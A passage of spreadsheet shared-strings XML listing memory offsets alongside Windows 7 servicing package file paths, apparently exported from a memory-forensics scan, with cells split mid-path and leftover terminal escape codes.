    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~zh-</t>
  </si>
  <si>
    <t>HK~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8ce2b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2647753~31bf3856ad364e35~x86~~6.1.4.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ce368</t>
  </si>
  <si>
    <t>CN~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8ce6b8</t>
  </si>
  <si>
    <t>d364e35~x86~~</t>
  </si>
  <si>
    <t>6.1.7600.16</t>
  </si>
  <si>
    <t>385.mu</t>
  </si>
  <si>
    <t>0xde8ce770</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~sr-</t>
  </si>
  <si>
    <t>LATN-CS~7.1.7</t>
  </si>
  <si>
    <t>601.16492.m</t>
  </si>
  <si>
    <t>0xde8ceb78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~lt-</t>
  </si>
  <si>
    <t>LT~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8ceec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Security-SPP-Component-SKU-Enterprise-Eval-Packa</t>
  </si>
  <si>
    <t>0xde8cef80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~ko-</t>
  </si>
  <si>
    <t>KR~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cf100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_167_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8cf1f8</t>
  </si>
  <si>
    <t>0xde8cf528</t>
  </si>
  <si>
    <t>0xde8cf5e0</t>
  </si>
  <si>
    <t>35~x86~en-US~</t>
  </si>
  <si>
    <t>8.0.7600.16</t>
  </si>
  <si>
    <t>0xde8cf970</t>
  </si>
  <si>
    <t>0xde8cfa28</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~sl-</t>
  </si>
  <si>
    <t>SI~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cfe30</t>
  </si>
  <si>
    <t>PT~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d01c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-LocalPack-US-Package~31bf3856ad364e35~x86~~6.1.7</t>
  </si>
  <si>
    <t>0xde8d0278</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~sv-</t>
  </si>
  <si>
    <t>SE~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d05c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~x86~~6.1</t>
  </si>
  <si>
    <t>0xde8d0680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~hr-</t>
  </si>
  <si>
    <t>HR~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d0a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~uk-</t>
  </si>
  <si>
    <t>UA~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d0e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~da-</t>
  </si>
  <si>
    <t>DK~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d1190</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~ar-</t>
  </si>
  <si>
    <t>SA~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d1598</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~it-</t>
  </si>
  <si>
    <t>IT~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d19b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TerminalServices-MiscRedirection-Package~31bf385</t>
  </si>
  <si>
    <t>6ad364e35~x86</t>
  </si>
  <si>
    <t>~~6.1.7600.</t>
  </si>
  <si>
    <t>0xde8d1a68</t>
  </si>
  <si>
    <t>TW~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d1e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~ru-</t>
  </si>
  <si>
    <t>RU~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d2038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_82_for_KB2685813~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d2238</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB3078601~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d2640</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3078601~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d2990</t>
  </si>
  <si>
    <t>~en-US~6.1.</t>
  </si>
  <si>
    <t>0xde8d2a48</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2834140~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d2e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~cs-</t>
  </si>
  <si>
    <t>CZ~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8d34a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-LocalPack-ZA-Package~31bf3856ad364e35~x86~~6.1.7</t>
  </si>
  <si>
    <t>0xde8d3558</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3156019~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d3970</t>
  </si>
  <si>
    <t>7514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d3a28</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_422_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d3e30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_338_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d4038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB3156019~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d43c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2385678~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d4480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3035132~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d47b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TFTP-Client-Package~31bf3856ad364e35~x86~en-US~6</t>
  </si>
  <si>
    <t>0xde8d4868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3156016~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d4c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3156016~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d5300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3042058_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d56f8</t>
  </si>
  <si>
    <t>0xde8d57b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d5ae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e</t>
  </si>
  <si>
    <t>0xde8d5b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2912390~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d5f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB3035132~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d6038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2912390_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d6358</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_504_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d66a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDC-Package~31bf3856ad364e35~x86~~6.1.7600.16385</t>
  </si>
  <si>
    <t>0xde8d6760</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_410_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d6b68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2912390~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K_x001B_[115</t>
  </si>
  <si>
    <t>0xde8d7340</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~f</t>
  </si>
  <si>
    <t>0xde8d7628</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EA</t>
  </si>
  <si>
    <t>618097E393409</t>
  </si>
  <si>
    <t>AFA316F0F87</t>
  </si>
  <si>
    <t>E2C202</t>
  </si>
  <si>
    <t>_1E65FD33F74047223AF4D58CBFD34BCE_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d7748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3035126_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d7a78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDC-Package~31bf3856ad364e35~x86~en-US~6.1.7600.</t>
  </si>
  <si>
    <t>0xde8d7b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3035126~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d7f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~~</t>
  </si>
  <si>
    <t>0xde8d8258</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~b</t>
  </si>
  <si>
    <t>0xde8d8660</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~n</t>
  </si>
  <si>
    <t>0xde8d8a68</t>
  </si>
  <si>
    <t>0xde8d8e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDC-Package~31bf3856ad364e35~x86~en-US~6.1.7601.</t>
  </si>
  <si>
    <t>0xde8d8f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~t</t>
  </si>
  <si>
    <t>0xde8d92a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~p</t>
  </si>
  <si>
    <t>0xde8d94a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_35_for_KB2992611~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d9c00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_43_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d9e00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_289_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8d9eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~s</t>
  </si>
  <si>
    <t>0xde8da1b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~e</t>
  </si>
  <si>
    <t>0xde8da5c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_324_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8da680</t>
  </si>
  <si>
    <t>0xde8daa68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~r</t>
  </si>
  <si>
    <t>0xde8dae50</t>
  </si>
  <si>
    <t>0xde8db038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2425227~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8db4d0</t>
  </si>
  <si>
    <t>0xde8db588</t>
  </si>
  <si>
    <t>0xde8db8d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TFTP-Client-Package~31bf3856ad364e35~x86~~6.1.76</t>
  </si>
  <si>
    <t>0xde8db990</t>
  </si>
  <si>
    <t>0xde8dbd98</t>
  </si>
  <si>
    <t>0xde8dc038</t>
  </si>
  <si>
    <t>0xde8dc4b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~h</t>
  </si>
  <si>
    <t>0xde8dc808</t>
  </si>
  <si>
    <t>0xde8dc8c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~d</t>
  </si>
  <si>
    <t>0xde8dccc8</t>
  </si>
  <si>
    <t>0xde8dd2b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_409_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8dd368</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~j</t>
  </si>
  <si>
    <t>0xde8dd770</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~l</t>
  </si>
  <si>
    <t>0xde8ddac0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3006137~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ddb78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~z</t>
  </si>
  <si>
    <t>0xde8ddec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Xps-Foundation-Client-Package~31bf3856ad364e35~x</t>
  </si>
  <si>
    <t>0xde8ddf80</t>
  </si>
  <si>
    <t>0xde8de3a8</t>
  </si>
  <si>
    <t>0xde8de6f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Printing-PremiumTools-Package~31bf3856ad364e35~x</t>
  </si>
  <si>
    <t>0xde8de7b0</t>
  </si>
  <si>
    <t>0xde8deb98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~k</t>
  </si>
  <si>
    <t>0xde8def80</t>
  </si>
  <si>
    <t>0xde8df2c0</t>
  </si>
  <si>
    <t>0xde8df610</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2425227~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8df6c8</t>
  </si>
  <si>
    <t>0xde8dfa18</t>
  </si>
  <si>
    <t>0xde8dfad0</t>
  </si>
  <si>
    <t>0xde8dfeb8</t>
  </si>
  <si>
    <t>0xde8e0240</t>
  </si>
  <si>
    <t>0xde8e0480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB3124275~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e0868</t>
  </si>
  <si>
    <t>8.0.7601.17</t>
  </si>
  <si>
    <t>514.mu</t>
  </si>
  <si>
    <t>0xde8e0d98</t>
  </si>
  <si>
    <t>0xde8e0e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~u</t>
  </si>
  <si>
    <t>0xde8e1150</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~i</t>
  </si>
  <si>
    <t>0xde8e1558</t>
  </si>
  <si>
    <t>0xde8e1970</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2491683_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e1a28</t>
  </si>
  <si>
    <t>0xde8e1e30</t>
  </si>
  <si>
    <t>0xde8e2200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3035126~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e25e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3035126~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e2918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3015428_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e29d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~c</t>
  </si>
  <si>
    <t>0xde8e2d00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2491683~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e2db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Multimedia-Package~31bf3856ad364e35~x86~a</t>
  </si>
  <si>
    <t>0xde8e33c0</t>
  </si>
  <si>
    <t>86~sv-SE~7.</t>
  </si>
  <si>
    <t>0xde8e3918</t>
  </si>
  <si>
    <t>0xde8e39d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_9_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e3db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_8_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e4038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Printing-Package~31bf3856ad364e35~x86~~7.</t>
  </si>
  <si>
    <t>0xde8e4388</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB971468~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e4440</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad</t>
  </si>
  <si>
    <t>364e35~x86~th</t>
  </si>
  <si>
    <t>-TH~7.1.760</t>
  </si>
  <si>
    <t>1.1649</t>
  </si>
  <si>
    <t>0xde8e4790</t>
  </si>
  <si>
    <t>0xde8e4848</t>
  </si>
  <si>
    <t>364e35~x86~fr</t>
  </si>
  <si>
    <t>-FR~7.1.760</t>
  </si>
  <si>
    <t>0xde8e4c50</t>
  </si>
  <si>
    <t>364e35~x86~~7</t>
  </si>
  <si>
    <t>.1.7601.164</t>
  </si>
  <si>
    <t>92.mum</t>
  </si>
  <si>
    <t>0xde8e5038</t>
  </si>
  <si>
    <t>364e35~x86~fi</t>
  </si>
  <si>
    <t>-FI~7.1.760</t>
  </si>
  <si>
    <t>0xde8e5358</t>
  </si>
  <si>
    <t>364e35~x86~sk</t>
  </si>
  <si>
    <t>-SK~7.1.760</t>
  </si>
  <si>
    <t>0xde8e5770</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2998812~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e5828</t>
  </si>
  <si>
    <t>364e35~x86~bg</t>
  </si>
  <si>
    <t>-BG~7.1.760</t>
  </si>
  <si>
    <t>0xde8e5c30</t>
  </si>
  <si>
    <t>364e35~x86~nb</t>
  </si>
  <si>
    <t>-NO~7.1.760</t>
  </si>
  <si>
    <t>0xde8e6308</t>
  </si>
  <si>
    <t>364e35~x86~pl</t>
  </si>
  <si>
    <t>-PL~7.1.760</t>
  </si>
  <si>
    <t>0xde8e6638</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Printing-Foundation-Package~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>0xde8e66f0</t>
  </si>
  <si>
    <t>364e35~x86~pt</t>
  </si>
  <si>
    <t>-BR~7.1.760</t>
  </si>
  <si>
    <t>0xde8e6a68</t>
  </si>
  <si>
    <t>0xde8e6b20</t>
  </si>
  <si>
    <t>11.2.9600.1</t>
  </si>
  <si>
    <t>6428.m</t>
  </si>
  <si>
    <t>0xde8e6f18</t>
  </si>
  <si>
    <t>0xde8e7300</t>
  </si>
  <si>
    <t>364e35~x86~el</t>
  </si>
  <si>
    <t>-GR~7.1.760</t>
  </si>
  <si>
    <t>0xde8e7708</t>
  </si>
  <si>
    <t>364e35~x86~en</t>
  </si>
  <si>
    <t>-US~7.1.760</t>
  </si>
  <si>
    <t>0xde8e7a58</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2491683~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e7b10</t>
  </si>
  <si>
    <t>-GB~7.1.760</t>
  </si>
  <si>
    <t>0xde8e7f18</t>
  </si>
  <si>
    <t>364e35~x86~ro</t>
  </si>
  <si>
    <t>-RO~7.1.760</t>
  </si>
  <si>
    <t>0xde8e8170</t>
  </si>
  <si>
    <t>364e35~x86~es</t>
  </si>
  <si>
    <t>-ES~7.1.760</t>
  </si>
  <si>
    <t>0xde8e84c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3015428~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e8578</t>
  </si>
  <si>
    <t>364e35~x86~et</t>
  </si>
  <si>
    <t>-EE~7.1.760</t>
  </si>
  <si>
    <t>0xde8e88c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2491683_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>_x001B_[0K_x001B_[104G</t>
  </si>
  <si>
    <t>0xde8e8980</t>
  </si>
  <si>
    <t>364e35~x86~nl</t>
  </si>
  <si>
    <t>-NL~7.1.760</t>
  </si>
  <si>
    <t>0xde8e8e50</t>
  </si>
  <si>
    <t>364e35~x86~tr</t>
  </si>
  <si>
    <t>-TR~7.1.760</t>
  </si>
  <si>
    <t>0xde8e9298</t>
  </si>
  <si>
    <t>364e35~x86~zh</t>
  </si>
  <si>
    <t>-HK~7.1.760</t>
  </si>
  <si>
    <t>0xde8e9680</t>
  </si>
  <si>
    <t>364e35~x86~he</t>
  </si>
  <si>
    <t>-IL~7.1.760</t>
  </si>
  <si>
    <t>0xde8e99b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2952664~31bf3856ad364e35~x86~~6.1.23.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e9a68</t>
  </si>
  <si>
    <t>364e35~x86~hu</t>
  </si>
  <si>
    <t>-HU~7.1.760</t>
  </si>
  <si>
    <t>0xde8e9d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2491683~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8e9e50</t>
  </si>
  <si>
    <t>364e35~x86~de</t>
  </si>
  <si>
    <t>-DE~7.1.760</t>
  </si>
  <si>
    <t>0xde8ea1b0</t>
  </si>
  <si>
    <t>364e35~x86~ko</t>
  </si>
  <si>
    <t>-KR~7.1.760</t>
  </si>
  <si>
    <t>0xde8ea500</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TerminalServices-WMIProvider-Package~31bf3856ad3</t>
  </si>
  <si>
    <t>64e35~x86~en-</t>
  </si>
  <si>
    <t>US~6.1.7601</t>
  </si>
  <si>
    <t>.17514</t>
  </si>
  <si>
    <t>0xde8ea5b8</t>
  </si>
  <si>
    <t>364e35~x86~hi</t>
  </si>
  <si>
    <t>-IN~7.1.760</t>
  </si>
  <si>
    <t>0xde8ea9a0</t>
  </si>
  <si>
    <t>364e35~x86~ja</t>
  </si>
  <si>
    <t>-JP~7.1.760</t>
  </si>
  <si>
    <t>0xde8eae50</t>
  </si>
  <si>
    <t>364e35~x86~lv</t>
  </si>
  <si>
    <t>-LV~7.1.760</t>
  </si>
  <si>
    <t>0xde8eb4d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB978601~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8eb588</t>
  </si>
  <si>
    <t>-CN~7.1.760</t>
  </si>
  <si>
    <t>0xde8eb8d8</t>
  </si>
  <si>
    <t>0xde8eb990</t>
  </si>
  <si>
    <t>364e35~x86~sr</t>
  </si>
  <si>
    <t>-LATN-CS~7.</t>
  </si>
  <si>
    <t>0xde8ebd98</t>
  </si>
  <si>
    <t>364e35~x86~lt</t>
  </si>
  <si>
    <t>-LT~7.1.760</t>
  </si>
  <si>
    <t>0xde8ec038</t>
  </si>
  <si>
    <t>-PT~7.1.760</t>
  </si>
  <si>
    <t>0xde8ec3e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e3</t>
  </si>
  <si>
    <t>0xde8ec4a0</t>
  </si>
  <si>
    <t>364e35~x86~sl</t>
  </si>
  <si>
    <t>-SI~7.1.760</t>
  </si>
  <si>
    <t>0xde8eca10</t>
  </si>
  <si>
    <t>0xde8ecd40</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2515325_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ecdf8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_204_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ed368</t>
  </si>
  <si>
    <t>364e35~x86~sv</t>
  </si>
  <si>
    <t>-SE~7.1.760</t>
  </si>
  <si>
    <t>0xde8ed6b8</t>
  </si>
  <si>
    <t>0xde8ed770</t>
  </si>
  <si>
    <t>364e35~x86~hr</t>
  </si>
  <si>
    <t>-HR~7.1.760</t>
  </si>
  <si>
    <t>0xde8edb78</t>
  </si>
  <si>
    <t>364e35~x86~uk</t>
  </si>
  <si>
    <t>-UA~7.1.760</t>
  </si>
  <si>
    <t>0xde8edf80</t>
  </si>
  <si>
    <t>364e35~x86~da</t>
  </si>
  <si>
    <t>-DK~7.1.760</t>
  </si>
  <si>
    <t>0xde8ee2f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2952664~31bf3856ad364e35~x86~~6.1.23.11.mum_x001B_[0K</t>
  </si>
